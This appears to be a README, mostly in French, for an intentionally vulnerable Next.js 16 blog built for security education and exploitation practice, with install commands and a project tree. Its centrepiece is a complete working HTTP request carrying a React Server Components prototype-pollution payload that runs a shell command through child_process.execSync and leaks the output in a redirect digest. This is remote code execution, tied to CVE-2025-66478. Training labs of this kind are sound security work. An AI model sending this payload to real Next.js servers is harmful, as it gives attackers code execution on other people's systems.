
IMPORTANT : Projet Next JS VULNÉRABLE créé uniquement à des fins éducatives, de test et d'exploitation. L'INSTALLATION EN PRODUCTION N'EST PAS RECOMMANDÉE, UNIQUEMENT EN ENVIRONNEMENT LOCAL OU CONTRÔLÉ.
Un blog moderne et élégant construit avec Next.js 16, React 19, shadcn/ui et Tailwind CSS.
Projet Next JS VULNÉRABLE créé uniquement à des fins éducatives, de tests et d'exploitation, INSTALLATION NON RECOMMANDÉE EN PRODUCTION, UNIQUEMENT EN ENVIRONNEMENT LOCAL OU CONTRÔLÉ
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
Référence : github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478
npm install
# o
yarn install
# o
pnpm install
npm run dev
# o
yarn dev
# o
pnpm dev
├── app/ # Páginas de Next.js
│ ├── blog/[id]/ # Página de detalle del blog
│ ├── profile/ # Página de perfil
│ ├── layout.tsx # Layout principal
│ └── page.tsx # Página principal
├── components/ # Componentes React
│ ├── auth/ # Componentes de autenticación
│ ├── blog/ # Componentes del blog
│ ├── layout/ # Componentes de layout
│ └── ui/ # Componentes shadcn/ui
├── lib/ # Utilidades y servicios
│ ├── auth.ts # Servicio de autenticación
│ ├── mocks.ts # Datos mock
│ └── utils.ts # Utilidades generales
└── public/ # Archivos estáticos
Toutes les données (blogs, utilisateurs, réactions) sont entièrement mock et générées dynamiquement. Aucune base de données n'est requise.
Ce projet est uniquement à des fins éducatives.